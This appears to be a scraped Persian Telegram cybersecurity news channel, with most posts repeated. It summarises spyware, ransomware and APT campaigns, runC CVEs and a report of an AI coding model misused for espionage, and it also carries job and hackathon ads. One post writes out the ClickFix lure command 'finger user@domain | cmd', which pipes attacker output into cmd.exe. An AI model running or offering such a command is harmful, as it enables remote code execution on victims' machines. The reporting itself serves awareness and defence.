جاسوسافزار جدید LandFall؛ حملهای خاموش از دل واتساپ به گوشیهای سامسونگ
بدافزار پیشرفتهای به نام LandFall با سوءاستفاده از یک zero-day در گوشیهای Samsung Galaxy موفق شد دستگاههای مدلهای جدید از جمله سری S22 تا S24 و Z Fold / Flip 4 را بدون نیاز به هیچ اقدامی از سوی کاربر آلوده کند. مهاجمان تنها با ارسال تصویری آلوده در واتساپ، از ضعف امنیتی در پردازش فایلهای تصویری DNG بهره میبردند تا کنترل کامل گوشی را در دست بگیرند.
پس از نفوذ، LandFall به قابلیتهای پیشرفتهای مانند ضبط صدا، دسترسی به پیامها و تماسها، سرقت موقعیت مکانی، تصاویر و فایلهای ذخیرهشده مجهز است — در واقع، یک مرکز جاسوسی کامل در جیب قربانی. سامسونگ با انتشار بهروزرسانی امنیتی در آوریل ۲۰۲۵ این نقص را برطرف کرد، اما حملات ماهها پیش از آن در جریان بوده است.
کاربران دستگاههای گلکسی باید فوراً سیستم خود را بهروزرسانی کرده و از نصب فایلها یا تصاویر ناشناس در پیامرسانها خودداری کنند — چراکه در دنیای امروز، حتی یک تصویر ساده میتواند دروازهای برای نفوذی پیچیده باشد.
بدافزار پیشرفتهای به نام LandFall با سوءاستفاده از یک zero-day در گوشیهای Samsung Galaxy موفق شد دستگاههای مدلهای جدید از جمله سری S22 تا S24 و Z Fold / Flip 4 را بدون نیاز به هیچ اقدامی از سوی کاربر آلوده کند. مهاجمان تنها با ارسال تصویری آلوده در واتساپ، از ضعف امنیتی در پردازش فایلهای تصویری DNG بهره میبردند تا کنترل کامل گوشی را در دست بگیرند.
پس از نفوذ، LandFall به قابلیتهای پیشرفتهای مانند ضبط صدا، دسترسی به پیامها و تماسها، سرقت موقعیت مکانی، تصاویر و فایلهای ذخیرهشده مجهز است — در واقع، یک مرکز جاسوسی کامل در جیب قربانی. سامسونگ با انتشار بهروزرسانی امنیتی در آوریل ۲۰۲۵ این نقص را برطرف کرد، اما حملات ماهها پیش از آن در جریان بوده است.
کاربران دستگاههای گلکسی باید فوراً سیستم خود را بهروزرسانی کرده و از نصب فایلها یا تصاویر ناشناس در پیامرسانها خودداری کنند — چراکه در دنیای امروز، حتی یک تصویر ساده میتواند دروازهای برای نفوذی پیچیده باشد.
❤3👍2
افشای آسیبپذیریهای بحرانی در runC؛ تهدیدی جدی برای زیرساختهای مبتنی بر Docker و Kubernetes
اخیراْ سه آسیبپذیری با سطح شدت بالا در ابزار runC شناسایی شده است؛ مولفهای کلیدی که بهعنوان موتور اجرای کانتینر در زیرساختهای Docker، Kubernetes و Podman مورد استفاده قرار میگیرد. این آسیبپذیریها با شناسههای CVE-2025-31133، CVE-2025-52565 و CVE-2025-52881 میتوانند به مهاجمان اجازه دهند از محیط ایزوله کانتینر خارج شده و به سطح سیستم میزبان (Host) با دسترسی Root نفوذ کنند — رخدادی که امنیت کل زنجیرهی کانتینری را به خطر میاندازد.
کارشناسان امنیتی هشدار دادهاند که این نقصها در صورت اجرای کانتینرهای دارای پیکربندی Mount خاص یا استفاده از Dockerfileهای آلوده، قابل بهرهبرداری هستند. گرچه تاکنون شواهدی از سوءاستفاده فعال گزارش نشده است، اما با توجه به اهمیت گستردهی runC در زیرساختهای ابری و DevOps، اعمال بهروزرسانی فوری حیاتی است توصیه میشود مدیران سامانهها نسخهی runC را حداقل به 1.2.8، 1.3.3 یا 1.4.0-rc3 ارتقا دهند و در صورت امکان از user namespaces و rootless containers برای کاهش سطح دسترسی بهره ببرند.
اخیراْ سه آسیبپذیری با سطح شدت بالا در ابزار runC شناسایی شده است؛ مولفهای کلیدی که بهعنوان موتور اجرای کانتینر در زیرساختهای Docker، Kubernetes و Podman مورد استفاده قرار میگیرد. این آسیبپذیریها با شناسههای CVE-2025-31133، CVE-2025-52565 و CVE-2025-52881 میتوانند به مهاجمان اجازه دهند از محیط ایزوله کانتینر خارج شده و به سطح سیستم میزبان (Host) با دسترسی Root نفوذ کنند — رخدادی که امنیت کل زنجیرهی کانتینری را به خطر میاندازد.
کارشناسان امنیتی هشدار دادهاند که این نقصها در صورت اجرای کانتینرهای دارای پیکربندی Mount خاص یا استفاده از Dockerfileهای آلوده، قابل بهرهبرداری هستند. گرچه تاکنون شواهدی از سوءاستفاده فعال گزارش نشده است، اما با توجه به اهمیت گستردهی runC در زیرساختهای ابری و DevOps، اعمال بهروزرسانی فوری حیاتی است توصیه میشود مدیران سامانهها نسخهی runC را حداقل به 1.2.8، 1.3.3 یا 1.4.0-rc3 ارتقا دهند و در صورت امکان از user namespaces و rootless containers برای کاهش سطح دسترسی بهره ببرند.
بازگشت APT37؛ سوءاستفاده از سرویس Google Find My Device برای پاکسازی تلفنهای اندرویدی
گروه APT37، وابسته به کره شمالی، در جدیدترین کارزار خود از قابلیتهای مدیریتی Google Find My Device (Find Hub) برای حذف دادههای کاربران اندروید بهره برده است. مهاجمان با اجرای حملات فیشینگ دقیق و انتشار بدافزار از طریق پیامرسان KakaoTalk، اطلاعات ورود به حسابهای گوگل قربانیان را سرقت کرده و سپس با دسترسی به این سرویس، دستگاهها را از راه دور ردیابی، قفل و در نهایت بهصورت کامل پاکسازی (Factory Reset) کردهاند، بدون آنکه کاربر فرصت واکنش داشته باشد.
زنجیرهی حمله معمولاً با پیامهایی فریبنده آغاز میشود که از سوی نهادهایی مانند پلیس یا سازمان مالیات ارسال شدهاند. بدافزار پس از نفوذ، کنترل حساب گوگل کاربر را در اختیار گرفته و با استفاده از Find Hub تمام دادههای ذخیرهشده را حذف میکند. در برخی موارد، از همان حساب آلوده برای انتشار بیشتر بدافزار به مخاطبان کاربر نیز استفاده شده است، چرخهای هوشمندانه که در سکوت کامل عمل میکند.
همین حالا احراز هویت دومرحلهای را فعال کنید و مراقب لینکها و پیامهای ناشناس باشید!
گروه APT37، وابسته به کره شمالی، در جدیدترین کارزار خود از قابلیتهای مدیریتی Google Find My Device (Find Hub) برای حذف دادههای کاربران اندروید بهره برده است. مهاجمان با اجرای حملات فیشینگ دقیق و انتشار بدافزار از طریق پیامرسان KakaoTalk، اطلاعات ورود به حسابهای گوگل قربانیان را سرقت کرده و سپس با دسترسی به این سرویس، دستگاهها را از راه دور ردیابی، قفل و در نهایت بهصورت کامل پاکسازی (Factory Reset) کردهاند، بدون آنکه کاربر فرصت واکنش داشته باشد.
زنجیرهی حمله معمولاً با پیامهایی فریبنده آغاز میشود که از سوی نهادهایی مانند پلیس یا سازمان مالیات ارسال شدهاند. بدافزار پس از نفوذ، کنترل حساب گوگل کاربر را در اختیار گرفته و با استفاده از Find Hub تمام دادههای ذخیرهشده را حذف میکند. در برخی موارد، از همان حساب آلوده برای انتشار بیشتر بدافزار به مخاطبان کاربر نیز استفاده شده است، چرخهای هوشمندانه که در سکوت کامل عمل میکند.
همین حالا احراز هویت دومرحلهای را فعال کنید و مراقب لینکها و پیامهای ناشناس باشید!
❤1
🔥 هکاتون رایگان کوئرا و همراه اول: رقابت کن و برنده شو!
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
افزایش چشمگیر فعالیت گروه COLDRIVER
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
خودکارسازی حملات سایبری توسط AI واقعیت یا اغراق؟
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
در یک کارزار بدافزاری، مهاجمان از پروتکل Finger که دههها پیش برای دریافت اطلاعات کاربران در سیستمهای یونیکس طراحی شده بود، بهعنوان یک بردار حمله سوءاستفاده میکنند. در این روش، قربانی با مهندسی اجتماعی تشویق میشود دستوری مانند finger user@domain | cmd را در خط فرمان اجرا کند. این دستور، خروجی دریافتی از سرور مهاجم را مستقیماً به cmd.exe منتقل کرده و امکان اجرای کد از راه دور را بدون نیاز به دانلود مستقیم فایل فراهم میکند. این تکنیک در برخی نسخهها به دانلود بدافزارهای Python-based و در نسخههای دیگر به اجرای NetSupport Manager RAT منجر میشود.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
در دنیای تحلیل بدافزار، انتخاب ابزار مناسب میتواند تفاوت میان یک تحلیل سطحی و یک ارزیابی دقیق و قابل اتکا باشد. Hybrid Analysis در مقایسه با VirusTotal برای بسیاری از تحلیلگران امنیتی گزینهای حرفهایتر به شمار میرود، زیرا رویکرد آن فراتر از اسکن سادهی آنتیویروسهاست. این پلتفرم با اجرای نمونه در یک محیط ایزوله، رفتار واقعی فایل—از ایجاد پردازههای مشکوک گرفته تا تلاش برای ارتباط با سرورهای ناشناس—را با دقت بررسی میکند. بهرهگیری از تحلیلهای عمیق رفتاری، نتایج ساختارمند و شفافسازی مبتنی بر چارچوبهای معتبری همچون MITRE ATT&CK، امکان تصمیمگیری هوشمندانهتر و کاهش خطاهای تحلیلی را فراهم میسازد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
❤1
یک مرکز دولتی در تهران در نظر دارد از بین داوطلبین مرد متخصص در حوزه SOC سطح 1، 2 و 3 با شرایط ذیل اقدام به جذب نیرو به صورت پروژه ای نماید :
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
🖥 ارسال رزومه به : [email protected]
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
Please open Telegram to view this post
VIEW IN TELEGRAM
🟧 تهدید جدید Tangerine Turkey؛ سوءاستفاده از USB برای ماینینگ مخفیانه
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار هدفمند و پیچیده، گروه باجافزاری CL0P با سوءاستفاده از آسیبپذیری بحرانی CVE-2025-61882 در Oracle E-Business Suite موفق به دسترسی غیرمجاز به محیط سازمانی برخی شرکتها شده است. این نقص امنیتی امکان اجرای کد از راه دور بدون نیاز به احراز هویت را فراهم کرده و مهاجمان از این قابلیت برای استخراج دادههای حساس، نقشهبرداری از سامانهها و استقرار ابزارهای ثانویه بهره بردهاند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
تحلیل فنی باجافزار The Gentlemen؛ یک تهدید نوظهور با معماری RaaS پیشرفته
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
